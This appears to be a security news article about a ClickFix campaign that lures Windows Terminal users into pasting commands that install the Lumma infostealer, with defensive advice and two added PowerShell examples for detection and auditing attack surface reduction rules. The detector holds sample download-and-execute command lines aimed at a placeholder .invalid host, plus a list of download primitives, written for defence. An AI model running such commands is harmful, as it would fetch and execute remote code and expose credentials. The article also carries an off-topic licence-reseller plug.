⚡ Quick Summary
- A new ClickFix social engineering variant tricks users into opening Windows Terminal and pasting malicious commands that deploy the Lumma credential-stealing infostealer.
- Lumma Stealer, a commercially available malware-as-a-service tool active since 2022, targets browser-stored passwords, session cookies, and crypto wallet data.
- The attack bypasses automated endpoint defences entirely because the malicious action is performed voluntarily by a trusted human user rather than an automated process.
- Developers, IT administrators, and DevOps engineers are the primary targets, as their elevated credentials carry the highest enterprise compromise potential.
- The infostealer market grew 72% year-over-year in 2023, with over 343 million credentials compromised — underscoring the scale of the commercial cybercrime ecosystem enabling these campaigns.
What Happened
Microsoft's security research teams have identified a sophisticated new variant of the long-running ClickFix social engineering campaign, one that represents a meaningful escalation in attacker methodology. Unlike earlier iterations of this scam, which typically directed victims toward downloading and executing malicious payloads through conventional browser-based delivery mechanisms, this latest wave leverages Windows Terminal — Microsoft's modern, GPU-accelerated command-line environment — as the attack vector of choice.
The mechanics are deceptively straightforward. Victims encounter what appears to be a routine error message or verification prompt on a compromised or fraudulent website. The page instructs them to open Windows Terminal (the consolidated shell environment that ships with Windows 11 and is available as a download for Windows 10 users), then paste a command string that the site has helpfully pre-loaded to their clipboard. The user, believing they are completing a legitimate troubleshooting or verification step, executes the command themselves — effectively bypassing virtually every automated endpoint defence in the process.
The payload being delivered through this mechanism is Lumma Stealer, a credential-harvesting malware-as-a-service (MaaS) tool that has been commercially available on Russian-language cybercrime forums since approximately 2022. Lumma is specifically engineered to exfiltrate browser-stored credentials, session cookies, cryptocurrency wallet data, and authentication tokens — the precise assets that give attackers persistent, monetisable access to corporate and personal accounts alike.
What makes this variant particularly alarming is the target selection. Windows Terminal is not a tool that casual home users typically open on a Tuesday afternoon. Its presence on a machine generally signals a developer, IT administrator, DevOps engineer, or power user — exactly the class of employee whose credentials carry the highest privilege escalation potential within an enterprise environment. Microsoft's security disclosure stops short of attributing the campaign to a specific threat actor group, but the sophistication of the targeting suggests organised, financially motivated cybercriminal infrastructure rather than opportunistic script-kiddies.
Background and Context
To understand why ClickFix has proven so durable and why this Terminal-based evolution is so significant, it helps to trace the technique's lineage. The original ClickFix pattern — sometimes called "paste and run" or "self-pwn" social engineering — first gained widespread attention in late 2023 and accelerated sharply through 2024. Early variants typically impersonated CAPTCHA services, Google reCAPTCHA prompts, or browser update notifications. The user would be instructed to press Win+R to open the Run dialog, then paste a PowerShell command that would silently download and execute a dropper.
The genius of the technique, from an attacker's perspective, is that it routes around the entire automated threat detection stack. Antivirus engines, email gateways, and browser sandboxes are all designed to intercept files being written to disk or processes being spawned by browser child processes. When a human being manually opens a shell and types or pastes a command, the operating system has no reliable mechanism to distinguish that action from legitimate administrative activity. It is, in security parlance, a "living off the land" technique elevated to an art form.
Lumma Stealer itself has an instructive history. First advertised on underground forums under the name "LummaC2" in mid-2022, it rapidly became one of the most commercially successful infostealer platforms in the cybercriminal ecosystem. Security researchers at Mandiant, Recorded Future, and ESET have all published analyses documenting Lumma's modular architecture, its use of dead-drop resolvers to evade C2 detection, and its subscription-based pricing model — reportedly ranging from $250 to $1,000 per month depending on feature tier. By 2024, Lumma had been implicated in breaches affecting financial services firms, healthcare providers, and technology companies across North America and Europe.
Windows Terminal, meanwhile, was first released as a preview in May 2019 and reached version 1.0 in May 2020. Microsoft positioned it as the modern replacement for the aging Command Prompt and the fragmented PowerShell experience. By Windows 11, Terminal became the default shell environment. Its adoption among developers and IT professionals has been near-universal, making it an attractive and high-value target surface for any attacker willing to invest in social engineering rather than technical exploits.
The pivot to Terminal specifically — rather than the older Run dialog approach — also reflects attackers adapting to Microsoft's own security improvements. Windows 11's enhanced Smart App Control and the tightening of macro execution policies in Microsoft 365 have closed several previously reliable delivery channels, pushing threat actors toward this more manual, socially-engineered approach.
Why This Matters
The implications of this campaign extend well beyond the immediate threat of credential theft, significant as that is. This attack pattern represents a fundamental challenge to the security model that most enterprise organisations have spent the last decade building.
Modern enterprise security architecture is predicated on a layered defence model: perimeter controls, endpoint detection and response (EDR) platforms, email filtering, browser isolation, and user behaviour analytics all working in concert. The ClickFix Terminal variant sidesteps every single one of these layers simultaneously. There is no malicious attachment to scan, no suspicious download to flag, no anomalous process spawn to detect — just a privileged user doing exactly what privileged users do, running commands in a terminal.
For IT professionals managing Windows environments, this creates a genuinely difficult policy problem. Blocking Windows Terminal access for all users would cripple developer productivity and hamper legitimate administrative workflows. Implementing application control policies granular enough to allow Terminal but block specific command patterns is technically feasible but operationally complex, and sophisticated attackers can trivially obfuscate their payloads to evade signature-based command-line monitoring.
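To make the command-line monitoring trade-off concrete, here is an added example (constructed for this article, not code from Microsoft, any EDR vendor, or the original piece): a PowerShell scorer run over constructed process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, CommandLine). It catches the common shape of a pasted payload and deliberately leaves the obfuscated variants the text warns about to behavioural telemetry.

```powershell
# Added example: score process-creation records for the shape of a pasted ClickFix
# payload. Field names follow Sysmon Event ID 1; the events below are constructed.
# Limitation: this is signature-style matching. Split strings, env-var expansion or
# a second-stage interpreter evade it, which is why it supplements EDR rather than
# replacing it.

function Expand-EncodedCommand {
    param([string]$CommandLine)
    # -e/-ec/-enc/-EncodedCommand take base64 of a UTF-16LE script; decode it so the
    # primitive checks below can see the real content.
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
    catch { $null }
}

function Test-ClickFixShellLaunch {
    param($Event)
    $strong = @()                       # indicators that are rare in normal developer use
    $fromTerminal = $Event.ParentImage -match '(?i)\\WindowsTerminal\.exe$'
    $cmd = $Event.CommandLine
    if ($cmd -match '(?i)-w(?:indowstyle)?\s+h(?:idden)?')   { $strong += 'hidden window' }
    if ($cmd -match '(?i)-e(?:xecutionpolicy|p)\s+bypass')   { $strong += 'execution policy bypass' }
    $decoded = Expand-EncodedCommand $cmd
    if ($decoded) { $strong += 'encoded command'; $cmd = "$cmd $decoded" }
    if ($cmd -match '(?i)\b(iwr|invoke-webrequest|invoke-expression|iex|downloadstring|mshta|certutil)\b') {
        $strong += 'download-or-eval primitive'
    }
    # A Terminal parent alone is normal for developers; it only lowers the bar.
    $suspicious = ($strong.Count -ge 2) -or ($fromTerminal -and $strong.Count -ge 1)
    [pscustomobject]@{
        Suspicious   = $suspicious
        FromTerminal = $fromTerminal
        Reasons      = ($strong -join '; ')
        CommandLine  = $Event.CommandLine
    }
}

# Constructed sample events. The URL is the reserved .invalid TLD; nothing here runs.
$EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('iwr http://example.invalid/x | iex'))
$TerminalPath = 'C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x64\WindowsTerminal.exe'  # constructed
$SampleEvents = @(
    [pscustomobject]@{ ParentImage = $TerminalPath; CommandLine = "powershell.exe -w hidden -ep bypass -ec $EncodedPayload" }
    [pscustomobject]@{ ParentImage = $TerminalPath; CommandLine = 'git status' }
    [pscustomobject]@{ ParentImage = $TerminalPath; CommandLine = 'powershell.exe -NoProfile -File .\build.ps1' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'                   # the older Run-dialog variant
                       CommandLine = 'powershell.exe -nop -w hidden -c "iwr http://example.invalid/y | iex"' }
)

$SampleEvents | ForEach-Object { Test-ClickFixShellLaunch $_ } | Format-Table -AutoSize
```

Only the first and last samples are flagged; the two ordinary developer launches under Windows Terminal pass, which is the false-positive balance the article describes.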
The credential theft angle deserves particular attention. Lumma Stealer's primary targets — browser-stored passwords, session cookies, and authentication tokens — are the foundation of modern identity-based access. In an era when most enterprise applications are SaaS-delivered and authentication is brokered through identity providers like Microsoft Entra ID (formerly Azure AD) or Okta, a stolen session token can grant an attacker access to an entire application portfolio without triggering MFA challenges. This is not theoretical: the 2023 MGM Resorts breach and the Caesars Entertainment compromise both involved session token theft as a critical enabler.
For organisations running Windows 11, ensuring that systems are fully patched and that Microsoft Defender for Endpoint's attack surface reduction (ASR) rules are properly configured is an immediate priority. Specifically, the rule that blocks process creations originating from PsExec and WMI commands, and the rule that blocks credential stealing from the Windows Local Security Authority Subsystem (lsass.exe), should be reviewed and enforced in block mode rather than audit mode.
The human element is, as always, the hardest to patch. Security awareness training that specifically addresses the "paste and run" social engineering pattern needs to be updated to include Terminal-based scenarios, not just the older Run dialog variants that most training curricula currently cover.
Industry Impact and Competitive Landscape
While this specific campaign targets Windows Terminal, the broader ClickFix technique is platform-agnostic in principle, and the security industry's response to it will shape defensive tooling across the ecosystem.
Microsoft is in an awkward position here. Windows Terminal is a product the company actively promotes as a developer productivity tool, and its tight integration with PowerShell, WSL2, and Azure CLI makes it central to the Microsoft developer experience. Any heavy-handed response — such as adding friction to Terminal launch or implementing aggressive command-line scanning — risks alienating the developer community that Microsoft has worked hard to win back over the past decade. The company's GitHub Copilot CLI integration, which suggests and executes terminal commands via AI assistance, makes this tension even more acute: Microsoft is simultaneously making Terminal more powerful and more central to workflows while attackers are exploiting that centrality.
Google faces a structurally similar challenge with its Cloud Shell environment, and Apple's Terminal application on macOS has been targeted by analogous campaigns, though the smaller enterprise footprint of macOS in traditional corporate environments limits the blast radius. The real competitive dimension here is in the security vendor space.
CrowdStrike, SentinelOne, and Microsoft's own Defender for Endpoint are all racing to develop behavioural detection capabilities that can identify malicious command-line activity without generating unacceptable false positive rates. CrowdStrike's Falcon platform has invested heavily in its "Indicators of Attack" (IoA) framework, which attempts to detect attacker intent from behavioural patterns rather than signatures — a methodology well-suited to catching ClickFix-style attacks. SentinelOne's Singularity platform similarly emphasises autonomous behavioural AI. Microsoft's Defender for Endpoint, which ships with Microsoft 365 E5 licensing, has the advantage of deep OS integration but has historically lagged third-party EDR vendors in detection velocity for novel social engineering campaigns.
The MaaS economy underpinning Lumma Stealer is itself a significant market dynamic. The commercialisation of infostealer tooling has dramatically lowered the barrier to entry for credential theft campaigns. Threat actors who lack the technical sophistication to develop their own malware can simply subscribe to Lumma's affiliate program, pay a monthly fee, and access a polished, regularly updated tool with customer support. This has contributed to a measurable increase in infostealer-related incidents: according to SpyCloud's 2024 Annual Identity Exposure Report, infostealer malware was responsible for the compromise of over 343 million credentials in 2023 alone — a 72% year-over-year increase.
For enterprise productivity software vendors broadly, this trend underscores why identity security and credential management have become the central battleground in enterprise cybersecurity, displacing the network perimeter as the primary defensive focus.
Expert Perspective
From a strategic security standpoint, what this campaign illustrates most clearly is the maturation of the social engineering threat landscape. Attackers have effectively completed a full circle: having found that technical exploits are increasingly expensive to develop and short-lived against patched systems, they have returned to the oldest technique in the playbook — convincing a trusted human to do the work for them — but wrapped in a technically sophisticated delivery mechanism that defeats modern automated defences.
The choice of Windows Terminal as the delivery vehicle is analytically significant. It signals that threat actors are conducting genuine reconnaissance into their target demographics. Terminal users are not random victims; they are selected because their credentials are more valuable. A developer's GitHub token, an IT admin's Azure service principal credentials, or a DevOps engineer's Kubernetes cluster access are orders of magnitude more damaging when compromised than a standard end-user's email password.
Industry analysts would note that this campaign also has implications for Microsoft's Copilot+ PC initiative and the broader push toward AI-assisted computing. As AI assistants increasingly suggest and execute terminal commands on behalf of users, the cognitive boundary between "a command I typed" and "a command I was told to type" becomes blurrier. Attackers will inevitably attempt to exploit this ambiguity, potentially crafting social engineering lures that mimic AI assistant interfaces to further lower user suspicion.
The forward-looking concern is prompt injection and AI-mediated command execution — a threat vector that is still nascent but growing rapidly as agentic AI systems gain enterprise adoption. The ClickFix Terminal campaign may, in retrospect, be seen as an early harbinger of that more complex threat landscape.
What This Means for Businesses
For business decision-makers and IT leaders, this campaign demands immediate but measured action across several fronts.
First, security awareness training programmes should be updated within the next 30 days to include specific scenarios involving Terminal-based social engineering. Employees with administrative or developer access — the highest-risk cohort — should receive targeted briefings. The message is simple: no legitimate service, verification system, or troubleshooting guide will ever ask you to open a terminal and paste a command from a website.
Second, IT teams should audit their Microsoft Defender for Endpoint ASR rule configurations. Many organisations deploy ASR rules in audit mode indefinitely, generating telemetry without actually blocking malicious activity. Rules specifically relevant to this threat vector should be moved to enforcement mode after appropriate testing.
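As an added example of that audit (not Microsoft's code or the article's), the PowerShell below uses the Defender cmdlets Get-MpPreference and Add-MpPreference to report the state of the two ASR rules the article names and, as a separate step, move any that are not in Block mode. The rule GUIDs are the ones published in Microsoft's ASR rule reference and should be checked against current documentation before enforcing; the session must be elevated.

```powershell
# Added example: audit the ASR rules this article names and optionally enforce them.
# GUIDs are from Microsoft's published ASR reference; verify before use.

$RulesOfInterest = @{
    'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations originating from PSExec and WMI commands'
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from LSASS'
}

# Action codes as reported by Get-MpPreference
$ActionNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

function Get-AsrRuleState {
    # Returns one object per rule of interest with its currently configured action.
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | ForEach-Object { $_.ToLower() })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)

    foreach ($guid in $RulesOfInterest.Keys) {
        # Ids and Actions are parallel arrays; a GUID missing from Ids is simply unconfigured
        $index = [Array]::IndexOf($ids, $guid)
        $code  = if ($index -ge 0) { [int]$actions[$index] } else { $null }
        [pscustomobject]@{
            RuleId   = $guid
            Name     = $RulesOfInterest[$guid]
            Action   = if ($null -eq $code) { 'NotConfigured' } else { $ActionNames[$code] }
            Enforced = ($code -eq 1)
        }
    }
}

function Set-AsrRuleBlockMode {
    # Moves every rule of interest that is not already in Block mode to Block.
    foreach ($state in Get-AsrRuleState) {
        if (-not $state.Enforced) {
            Write-Host "Moving '$($state.Name)' from $($state.Action) to Block"
            # Add-MpPreference updates the action of an already-listed rule in place
            Add-MpPreference -AttackSurfaceReductionRules_Ids $state.RuleId `
                             -AttackSurfaceReductionRules_Actions Enabled
        }
    }
}

# Report first. Call Set-AsrRuleBlockMode only after the audit-mode telemetry has
# been reviewed for legitimate admin tooling that the rules would now block.
Get-AsrRuleState | Format-Table -AutoSize
```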
Third, privileged access workstations (PAWs) — dedicated, hardened machines used exclusively for administrative tasks — should have web browsing restricted or eliminated entirely. An admin who cannot browse arbitrary websites on their administrative workstation cannot be lured to a ClickFix page on that machine.
Fourth, organisations should review their browser credential storage policies. Storing passwords in browser vaults is convenient but creates a concentrated, high-value target for infostealers. Enterprise password managers with hardware-backed credential storage offer meaningfully better security posture.
On the licensing front, organisations looking to maximise their security tooling investment should ensure they are fully utilising the security capabilities included in their existing Microsoft 365 subscriptions before purchasing additional point solutions. Businesses can also reduce overhead costs by sourcing an affordable Microsoft Office licence through legitimate resellers, freeing budget for security tooling investments.
Key Takeaways
- A new ClickFix variant targets Windows Terminal users, tricking them into pasting malicious commands that deliver the Lumma infostealer — bypassing automated endpoint defences entirely through social engineering.
- Lumma Stealer is a commercially available MaaS tool that specifically harvests browser credentials, session cookies, and authentication tokens, enabling persistent, privilege-escalated access to enterprise SaaS environments.
- The attack is particularly dangerous for developers and IT administrators, whose Terminal access and elevated privileges make their credentials disproportionately valuable to attackers.
- Traditional endpoint security tools are largely ineffective against this technique because the malicious action is performed by a legitimate, trusted user rather than an automated process or downloaded file.
- Microsoft's Attack Surface Reduction rules in Defender for Endpoint offer partial mitigation, but must be configured in enforcement mode — many organisations leave them in audit-only mode, providing telemetry but no protection.
- The infostealer market grew 72% year-over-year in 2023, driven by the commercialisation of MaaS platforms like Lumma, dramatically lowering the barrier to entry for credential theft campaigns.
- Security awareness training must be updated immediately to address Terminal-based social engineering scenarios, as most current curricula focus on the older Run dialog variant of ClickFix.
Looking Ahead
Several developments in the coming months will determine how this threat evolves and how effectively the industry responds.
Microsoft is expected to continue expanding Defender for Endpoint's behavioural detection capabilities, and the company's Security Copilot platform — its AI-powered security operations tool — may eventually be able to correlate clipboard activity with suspicious web browsing patterns to flag ClickFix-style attacks before execution. Watch for updates to Microsoft's ASR rule documentation and any changes to Windows Terminal's default security posture in upcoming Windows 11 cumulative updates.
The broader ClickFix technique will almost certainly continue to evolve. Expect attackers to experiment with lures that mimic AI assistant interfaces, IDE error messages, and cloud platform notifications — all high-credibility contexts for a developer or IT professional. The integration of Windows Terminal with GitHub Copilot CLI and Azure Developer CLI creates new impersonation opportunities that threat actors will not ignore.
Law enforcement actions against Lumma Stealer's infrastructure — similar to the 2024 disruption of the Redline and META infostealer operations by Europol and the FBI — remain possible but have historically produced only temporary disruptions to MaaS ecosystems. The underlying criminal infrastructure tends to reconstitute quickly. The most durable defence will be organisational and procedural, not technological.
Frequently Asked Questions
What is the ClickFix attack and how does the Windows Terminal variant work?
ClickFix is a social engineering technique where victims are shown a fake error message or verification prompt on a malicious or compromised website. The page instructs them to open a specific system tool — in this latest variant, Windows Terminal — and paste a command that the site has pre-loaded to their clipboard. Because the user performs the action themselves, it bypasses automated security tools that monitor for malicious file downloads or suspicious process spawning. The pasted command then silently installs the Lumma infostealer, which proceeds to harvest credentials from the browser and system.
Why is Lumma Stealer particularly dangerous for enterprise environments?
Lumma Stealer is specifically engineered to extract browser-stored passwords, active session cookies, and authentication tokens — the credentials that grant access to cloud applications and SaaS platforms. In modern enterprises where most applications are accessed through identity providers like Microsoft Entra ID or Okta, a stolen session token can allow an attacker to bypass multi-factor authentication entirely and access an entire application portfolio. Lumma also targets cryptocurrency wallets and stored form data, making it highly monetisable. Its commercial MaaS model means it is regularly updated by its developers to evade detection.
What can IT departments do right now to protect against this threat?
IT teams should take several immediate steps: update security awareness training to include Terminal-based social engineering scenarios; audit Microsoft Defender for Endpoint ASR (Attack Surface Reduction) rules and move relevant rules from audit mode to enforcement mode; restrict web browsing on privileged access workstations used for administrative tasks; review browser credential storage policies and consider migrating to hardware-backed enterprise password managers; and ensure Windows 11 systems are fully patched with the latest cumulative updates. Organisations should also review their identity provider configurations to ensure session token lifetimes are appropriately limited.
Does this attack affect Windows 10 users or only Windows 11?
Windows Terminal is the default shell environment in Windows 11, but it is also available as a free download from the Microsoft Store for Windows 10 users, and it ships pre-installed on many Windows 10 developer and enterprise builds. Any user who has Windows Terminal installed — regardless of whether they are on Windows 10 or Windows 11 — is potentially susceptible to this social engineering attack. The attack relies on the user's willingness to follow instructions, not on any specific OS vulnerability, so the version of Windows matters less than whether the user has Terminal installed and whether they can be convinced to use it.